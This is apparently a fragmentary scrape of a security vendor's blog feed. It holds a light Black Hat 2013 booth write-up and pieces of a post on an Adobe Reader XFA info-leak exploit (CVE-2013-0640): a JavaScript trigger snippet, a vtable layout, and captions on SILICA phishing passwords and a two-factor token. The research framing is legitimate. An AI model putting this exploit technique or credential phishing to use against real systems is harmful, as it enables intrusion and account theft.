\niptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT\niptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\niptables -A POSTROUTING -t nat -j MASQUERADE\nsysctl -w net.ipv4.ip_forward=1\n
Walking through the events on multiple stations |
Process Usage: An easy way to identify process used only a small amount of time |
Analyzing triggered events over time |
Event Inspection |
Things I observed\n
- Let me define booth babes as someone you short-term hire specifically to work your booth to attract people's attention based on their looks. I only saw one vendor, ironically an educational vendor, who had staff that fit this description.\n\n
- I made it a point to talk to some women who came through our booth about booth babes and I found some very different definitions as to what would qualify someone. The most liberal definition was the babe in question could be a full time employee but if they got especially \"tarted up\" for their booth time then they qualified. By this definition there appeared to be significantly more booth babes in attendance. \n\n
- One vendor who put up an enormous booth near the front had, and I'm not kidding, a grandpa doing a magic show. Later their PR person came over and introduced himself scouting for business. I wish I had the presence of mind to ask how that decision happened.\n\n
- Did Randy Couture count a male booth babe or as a celebrity endorsement? If he is a booth babe he's the only one who can easily get me in a rear naked choke, so he's whatever he wants to be.\n\n
Things we Learned\n
- The big buzzword this year was \"managed\", manage your VPNs, manage your logs, manage your certificates, manage your ssh keys (?!), manage your life! \n\n
- Nico and I both walked around and didn't see any new products that blew our minds.\n\n
- Immunity went with no dedicated sales staff and I think it worked out well. People were pretty surprised when they talked to someone who knew what was going on with their product. Is it worth taking technical people off of other projects to staff a booth? I think regarding reputation it probably is, regarding revenue still remains to be seen.\n\n
- I saw a bunch of vendors with six figure booths setting up seating and making people watch movies. I didn't see a lot of butts in seats. What did work surprisingly well was a trivia game the Venafi folks set up where you could win an Apple TV. Every time they did this they had a pretty sizable crowd and they were nice guys to boot.\n\n
- When Nico approaches your booth where you're advertising a product to implement \"zero day protection\" to ask some very pointed questions, that's an intimidating situation. But these folks weren't intimidated. Why? Because they were marketing and sales engineering people who had no idea how their product actually worked to survive any level of professional scrutiny.\n\n
- Almost all of the material I demoed for SWARM was stuff I found the day before the sponsor hall opened. David A. and I put in a crap ton of work getting the SWARM set up working in a laptop powered VM but not so much on what we were going to show. It created the opportunity to find something new in our dataset and get excited about it which made a really effective demo. \n\n
- We had a bunch of grumpy old men approach our booth this year. They all seemed to respond well to me giving it right back to them. Perhaps a winning strategy?\n\n
- I saw folks throwing out some guesses about the number of women present. I saw 1:15 through 1:30, I wasn't keeping count (that would be creepy) but it seemed like more than last year. I chatted with @Tardissauce a bit about this at hackcup. Her thought was that Blackhat tends to attract attendees higher up the corporate ladder than DefCon, there are more women in these positions now and therefore that ratio is going to start to even out. It's odd since the talks are normally highly technical. It is the rare manager who can appreciate a talk on double-fetch bugs in the Windows Kernel.\n\n
Booth stuff\n
- Investing in carpet and padding underneath is completely worth it, my knees and feet were saved\n\n
- If you're going to buy labor, buy tear down labor rather than setup labor. You'll want to get your booth set up just the way you want it initially but by the end of the conference you're so tired you just want someone else to pack everything up. We waited 3.5 hours for our pallet and supplies to come to our booth at the end of the conference. Things got weird.\n\n
- In our 3.5 hours of time I did a lot of walking around the vendor hall as it was being packed up. I counted about 5 servers or devices I could've made off with without anyone being the wiser. If you're bringing that type of gear secure it yourself before tear down.\n\n
- I think our booth looked pretty good but we did have a lot of people asking us \"so what do you guys do?\" If we were going to do something like this again we'd want to put some kind of sign up like: \"Pen-Testing Tools for Professionals\". It was pretty liberating to repeatedly tell people that I didn't give a toss about configuring a firewall though.\n\n
- Invest in shirts that are not black. Everyone wore black shirts.\n\n
- I can almost guarantee your sales slicks are too wordy. I ain't reading a white paper here.\n\n
- There needs to be a medical reason for you to wear sunglasses at your booth, which is inside.\n\n
Vendor Freebies\n
- Best Overall: Again Qualys wins with their red freebie bag. As soon as you walked in the vendor hall you saw Qualys' booth and had the opportunity to get a reasonable quality bag for all your freebies. Everyone had one and everyone put all the other vendor freebies into their Qualys bag, reducing the exposure of other vendors and limiting the impact of their marketing investment. WELL PLAYED QUALYS >:[\n\n
- Best Shirt: Spider Labs' mall-airbrush-kiosk style graffiti on a bright orange shirt
\n- Shirt Runner-Up: Splunk \"Taking the sh out of it\"
\n- Shirt honorable mention: Core Security, faux-tux shirt
\n\n
- Worst Overall: I didn't like the light saber thingies at all and no one I talked to about it did either. I guess the hook was that if you took this training it turned you into some kind of hacking Jedi? Brotip: if you're turning people into Jedi's you should at least be able to talk about your syllabus without referring people directly to your website :P\n\n
Shameless plugs\n
You can read my 2012 vendor perspective blog post here. "],"link":["https://immunityproducts.blogspot.com/2013/08/blackhat-2013-vendors-perspective.html"],"author":["noreply@blogger.com (Alex McGeorge)"],"thr:total":["0"],"text_description":"Immunity was a Blackhat sponsor again this year, potentially our last outing for a while. Thanks to everyone who came by our booth! It was fun to meet customers face to face and friends we don't get to see that often. \n\nThings I observed\n- Let me define booth babes as someone you short-term hire specifically to work your booth to attract people's attention based on their looks. I only saw one vendor, ironically an educational vendor, who had staff that fit this description.\n\n- I made it a point to talk to some women who came through our booth about booth babes and I found some very different definitions as to what would qualify someone. The most liberal definition was the babe in question could be a full time employee but if they got especially \"tarted up\" for their booth time then they qualified. By this definition there appeared to be significantly more booth babes in attendance. \n\n- One vendor who put up an enormous booth near the front had, and I'm not kidding, a grandpa doing a magic show. Later their PR person came over and introduced himself scouting for business. I wish I had the presence of mind to ask how that decision happened.\n\n- Did Randy Couture count a male booth babe or as a celebrity endorsement? If he is a booth babe he's the only one who can easily get me in a rear naked choke, so he's whatever he wants to be.\n\nThings we Learned\n- The big buzzword this year was \"managed\", manage your VPNs, manage your logs, manage your certificates, manage your ssh keys (?!), manage your life! \n\n- Nico and I both walked around and didn't see any new products that blew our minds.\n\n- Immunity went with no dedicated sales staff and I think it worked out well. People were pretty surprised when they talked to someone who knew what was going on with their product. Is it worth taking technical people off of other projects to staff a booth? I think regarding reputation it probably is, regarding revenue still remains to be seen.\n\n- I saw a bunch of vendors with six figure booths setting up seating and making people watch movies. I didn't see a lot of butts in seats. What did work surprisingly well was a trivia game the Venafi folks set up where you could win an Apple TV. Every time they did this they had a pretty sizable crowd and they were nice guys to boot.\n\n- When Nico approaches your booth where you're advertising a product to implement \"zero day protection\" to ask some very pointed questions, that's an intimidating situation. But these folks weren't intimidated. Why? Because they were marketing and sales engineering people who had no idea how their product actually worked to survive any level of professional scrutiny.\n\n- Almost all of the material I demoed for SWARM was stuff I found the day before the sponsor hall opened. David A. and I put in a crap ton of work getting the SWARM set up working in a laptop powered VM but not so much on what we were going to show. It created the opportunity to find something new in our dataset and get excited about it which made a really effective demo. \n\n- We had a bunch of grumpy old men approach our booth this year. They all seemed to respond well to me giving it right back to them. Perhaps a winning strategy?\n\n- I saw folks throwing out some guesses about the number of women present. I saw 1:15 through 1:30, I wasn't keeping count (that would be creepy) but it seemed like more than last year. I chatted with @Tardissauce a bit about this at hackcup. Her thought was that Blackhat tends to attract attendees higher up the corporate ladder than DefCon, there are more women in these positions now and therefore that ratio is going to start to even out. It's odd since the talks are normally highly technical. It is the rare manager who can appreciate a talk on double-fetch bugs in the Windows Kernel.\n\nBooth stuff\n- Investing in carpet and padding underneath is completely worth it, my knees and feet were saved\n\n- If you're going to buy labor, buy tear down labor rather than setup labor. You'll want to get your booth set up just the way you want it initially but by the end of the conference you're so tired you just want someone else to pack everything up. We waited 3.5 hours for our pallet and supplies to come to our booth at the end of the conference. Things got weird.\n\n- In our 3.5 hours of time I did a lot of walking around the vendor hall as it was being packed up. I counted about 5 servers or devices I could've made off with without anyone being the wiser. If you're bringing that type of gear secure it yourself before tear down.\n\n- I think our booth looked pretty good but we did have a lot of people asking us \"so what do you guys do?\" If we were going to do something like this again we'd want to put some kind of sign up like: \"Pen-Testing Tools for Professionals\". It was pretty liberating to repeatedly tell people that I didn't give a toss about configuring a firewall though.\n\n- Invest in shirts that are not black. Everyone wore black shirts.\n\n- I can almost guarantee your sales slicks are too wordy. I ain't reading a white paper here.\n\n- There needs to be a medical reason for you to wear sunglasses at your booth, which is inside.\n\nVendor Freebies\n- Best Overall: Again Qualys wins with their red freebie bag. As soon as you walked in the vendor hall you saw Qualys' booth and had the opportunity to get a reasonable quality bag for all your freebies. Everyone had one and everyone put all the other vendor freebies into their Qualys bag, reducing the exposure of other vendors and limiting the impact of their marketing investment. WELL PLAYED QUALYS >:[\n\n- Best Shirt: Spider Labs' mall-airbrush-kiosk style graffiti on a bright orange shirt\n- Shirt Runner-Up: Splunk \"Taking the sh out of it\" \n- Shirt honorable mention: Core Security, faux-tux shirt \n\n- Worst Overall: I didn't like the light saber thingies at all and no one I talked to about it did either. I guess the hook was that if you took this training it turned you into some kind of hacking Jedi? Brotip: if you're turning people into Jedi's you should at least be able to talk about your syllabus without referring people directly to your website :P\n\nShameless plugs\nYou can read my 2012 vendor perspective blog post here. "},{"guid":[{"_":"tag:blogger.com,1999:blog-7337853103195839314.post-1765978048724037010","$":{"isPermaLink":"false"}}],"pubDate":["Mon, 24 Jun 2013 14:39:00 +0000"],"atom:updated":["2013-06-24T07:39:56.911-07:00"],"category":[{"_":"adobe","$":{"domain":"http://www.blogger.com/atom/ns#"}},{"_":"CANVAS","$":{"domain":"http://www.blogger.com/atom/ns#"}},{"_":"CVE-2013-0640","$":{"domain":"http://www.blogger.com/atom/ns#"}},{"_":"mosdef","$":{"domain":"http://www.blogger.com/atom/ns#"}}],"title":["Adobe XFA exploits for all! First Part: The Info-leak"],"description":["
var node = xfa.resolveNode\n(\"xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#ui\");\n\n node.oneOfChild = choiceListNodes.pop();\n\n
---- 0x0 Vtable pointer\n | 0x4 RefCount\n ---> 0x8 Destructor's address\n\n
Infoleak running on a Windows 7 |
Facebook, Twitter, Hotmail and Gmail account passwords intercepted in SSL traffic during a controlled phishing attacked using SILICA. |
90% of people will click \"Continue\" to get what they came for and give SILICA the passwords. |
Using SILICA to successfully phish for a legitimate Twitter two-factor authentication token. |
Version | \nPercentage | \n
13.X | \n12.6% | \n
12.X | \n21.5% | \n
11.X | \n20.4% | \n
10.X | \n21.1% | \n
9.X | \n17.4% | \n
8.X | \n2.8% | \n
7.X | \n2.7% | \n
6.X | \n1.4% | \n